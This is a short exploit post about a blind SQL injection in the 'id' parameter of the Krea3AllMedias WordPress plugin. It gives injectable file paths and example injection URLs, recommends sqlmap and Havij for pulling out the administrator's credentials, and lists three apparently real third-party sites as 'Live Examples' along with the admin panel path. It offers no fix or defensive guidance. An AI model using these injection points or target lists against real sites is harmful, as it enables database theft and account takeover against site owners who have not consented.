WordPress Plugins – An SQL injection vulnerability was found in the Krea3AllMedias plugin. Through it, the MySQL database behind the site can be reached and its data extracted. The affected paths are listed below.
____________________________________
The Krea3AllMedias WordPress plugin is prone to an SQL injection vulnerability that is best exploited with an automated tool. The 'id' parameter is hard to exploit by hand because the vulnerable column cannot be identified with a UNION SELECT request: none of the selected values is ever displayed in the page, so the injection is blind. An automated tool can still pull data out of the database through the blind injection and recover the administrator's credentials.
I recommend using sqlmap on Linux and Havij on Windows.
The 'id' parameter is injectable in playlist.php, LineGallery.php and ArtGallery.php.
Examples :
http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1'
http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/premium/ArtGallery.php?id=1'
http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/premium/LineGallery.php?id=1'
Live Examples :
http://www.krea3.fr/wp-content/plugins/Krea3Allmedias/application/services/premium/LineGallery.php?id=5
http://www.restaurant-honfleur-alcyone.fr/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1
http://www.beuzeville-tourisme.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1
Admin Panel :
http://www.example.com/wp-admin